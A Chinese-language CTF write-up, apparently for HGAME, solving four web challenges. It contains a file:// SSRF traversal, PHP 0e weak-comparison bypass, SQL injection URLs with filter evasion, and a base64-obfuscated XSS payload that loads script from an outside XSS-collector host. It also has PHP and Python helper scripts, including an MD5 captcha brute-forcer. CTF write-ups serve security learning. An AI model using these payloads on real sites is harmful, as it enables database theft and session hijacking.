Cosmos的博客后台
使用伪协议读取代码后发现可以直接通过所谓的debug模式进行用户名和密码的读取
密码可以随便找一个md5加密后以0e开头的字符串进行弱类型比较；进入后台后发现是一个ssrf的模板，直接使用file协议跨目录读取根目录下的flag：file://localhost/../../../../flag，再解一下图片的base64即可。
Cosmos的留言板-1
过滤了空格，使用 /**/ 代替；双写 select 后即可进行注入：
后即可进行注入http://139.199.182.61/index.php?id=-1%27/**/union/**/seselectlect/**/(seselectlect/**/group_concat(table_name)/**/from/**/information_schema.tables/**/where/**/table_schema=database())%23
http://139.199.182.61/index.php?id=-1%27/**/union/**/seselectlect/**/(seselectlect/**/group_concat(column_name)/**/from/**/information_schema.columns/**/where/**/table_name=%27f1aggggggggggggg%27)%23
http://139.199.182.61/index.php?id=-1%27/**/union/**/seselectlect/**/(seselectlect/**/fl4444444g/**/from/**/f1aggggggggggggg)%23
Cosmos的新语言
直接贴脚本了
<?php
/**
 * Inverse of the challenge's "encrypt": every byte was shifted up by one,
 * so shift each byte back down by one.  ord()/chr() are byte-wise, so
 * multi-byte input is handled byte by byte; a 0x00 byte wraps to 0xFF.
 *
 * @param string $str encoded text
 * @return string decoded text
 */
function decrypt($str){
    $bytes = array();
    $len = strlen($str);
    for ($pos = 0; $pos < $len; ++$pos) {
        $bytes[] = chr(ord($str[$pos]) - 1);
    }
    return implode('', $bytes);
}
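/**
 * Return the text between the first occurrence of $mark1 and the first
 * occurrence of $mark2 in $kw1 (case-insensitive), or 0 when either mark
 * is missing or $mark2 does not come after $mark1.
 *
 * The original compared the stripos() results with "== false", which also
 * rejects a legitimate hit at offset 0, and padded the haystack with '123'
 * to dodge that.  A strict "=== false" test makes the padding unnecessary
 * and stops the padding itself from being matched by marks such as '1'.
 * The opening mark is now skipped in full rather than by a single byte.
 *
 * @param string $kw1   haystack
 * @param string $mark1 opening mark
 * @param string $mark2 closing mark
 * @return string|int   matched substring, or 0 on failure (kept for callers)
 */
function getNeedBetween($kw1,$mark1,$mark2){
    $st = stripos($kw1, $mark1);
    $ed = stripos($kw1, $mark2);
    // Strict comparison: offset 0 is a valid hit, only false means "not found".
    if ($st === false || $ed === false || $st >= $ed) {
        return 0;
    }
    // Skip the whole opening mark, not just its first byte.
    $from = $st + strlen($mark1);
    if ($from > $ed) {
        return 0;
    }
    return substr($kw1, $from, $ed - $from);
}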
/**
 * Send an application/x-www-form-urlencoded POST through PHP's HTTP stream
 * wrapper and hand back the raw response body.
 *
 * @param string $url       target URL
 * @param array  $post_data form fields, encoded with http_build_query()
 * @return string|false     response body, or false as file_get_contents reports it
 */
function send_post($url, $post_data) {
    $context = stream_context_create(array(
        'http' => array(
            'method'  => 'POST',
            'header'  => 'Content-type:application/x-www-form-urlencoded',
            'content' => http_build_query($post_data),
        ),
    ));
    return file_get_contents($url, false, $context);
}
// Challenge endpoints: the landing page carries the encoded token and
// /mycode shows the PHP that produced it.
$url = "http://59bca5b1ca.php.hgame.n3ko.co/";
$url2 = "http://59bca5b1ca.php.hgame.n3ko.co/mycode";
$html = file_get_contents($url);
$html2 = file_get_contents($url2);

// Split the shown source on '(' and keep pieces 6..15 — presumably the ten
// function names of the nested call chain, in source order (offsets are
// specific to this page layout).
$pieces = explode('(', $html2);
$arr = array();
foreach (range(6, 15) as $idx) {
    array_push($arr, $pieces[$idx]);
}
var_dump($arr);

// The encoded token starts 95 bytes into the tag-stripped landing page.
$encode = substr(strip_tags($html), 95);

// Apply the inverse of every listed call, in the listed order; names that
// are not one of the four known transforms are ignored.
foreach ($arr as $fn) {
    switch ($fn) {
        case 'str_rot13':
            $encode = str_rot13($encode);
            break;
        case 'encrypt':
            $encode = decrypt($encode);
            break;
        case 'base64_encode':
            $encode = base64_decode($encode);
            break;
        case 'strrev':
            $encode = strrev($encode);
            break;
    }
}
echo $encode;

echo send_post('http://59bca5b1ca.php.hgame.n3ko.co/index.php', array('token' => $encode));
?>
Cosmos的聊天室
过滤了成对的尖括号，将输入的内容大写，并且直接将 script 替换为无意义的字符，参考手册：
https://www.secpulse.com/archives/61940.html
首先利用括号半开解决成对尖括号被过滤的问题,然后十进制的方式同时解决了script和内容大写的问题,最后找个xss平台接收一发
<img src=x one rror="eval(atob('cz1jcmVhdGVFbGVtZW50KCdzY3JpcHQnKTtib2R5LmFwcGVuZENoaWxkKHMpO3Muc3JjPSdodHRwOi8veHNzcHQuY29tL3U1YmhmMz8nK01hdGgucmFuZG9tKCk='))"
至于验证码用现成的脚本就好
import hashlib
from multiprocessing.dummy import Pool as ThreadPool
# MD5截断数值已知 求原始数据
# 例子 substr(md5(captcha), 0, 6)=60b7ef
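def md5(s):
    """Return the hex MD5 digest of ``str(s)`` encoded as UTF-8."""
    return hashlib.md5(str(s).encode('utf-8')).hexdigest()


# Known truncated digest from the challenge, e.g. substr(md5(captcha), 0, 6).
keymd5 = '3849c2'
md5start = 0   # offset of the known substring inside the 32-char hex digest
md5length = 6  # length of the known substring


def findmd5(sss, target=None, start=None, length=None):
    """Scan one ``"lo:hi"`` integer range for a value whose MD5 matches.

    Args:
        sss: range to scan, written ``"start:end"`` (end exclusive), as
            produced by the worker list below.
        target: expected hex substring; defaults to ``keymd5``.
        start: offset of that substring in the digest; defaults to ``md5start``.
        length: its length; defaults to ``md5length``.

    Returns:
        The first matching integer, or ``None`` when the range has no hit.
        A hit is also printed, because the thread-pool caller only reads
        stdout.

    Note: a 6-hex-char truncation leaves only 16**6 (~16.7M) distinct
    values, so a captcha built this way is exhausted in seconds; it is a
    proof-of-work, not a secret, and offers no brute-force resistance.
    """
    target = keymd5 if target is None else target
    start = md5start if start is None else start
    length = md5length if length is None else length
    key = sss.split(':')
    lo = int(key[0])
    hi = int(key[1])
    # With the defaults (0, 6) the slice is [0:6], the same window the
    # original hard-coded.
    for i in range(lo, hi):
        if md5(i)[start:start + length] == target:
            print(i)
            return i
    return None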
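# Ten disjoint "start:end" ranges of 10,000,000 values each, one per worker,
# so 0..99,999,999 is covered exactly once.  Named `ranges` rather than
# `list` so the builtin is not shadowed for the rest of the module.
ranges = ['%d:%d' % (10000000 * i, 10000000 * (i + 1)) for i in range(10)]
pool = ThreadPool()
pool.map(findmd5, ranges)  # map() is synchronous: returns once every range is scanned
pool.close()
pool.join()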
替换一下token即可完成flag的获取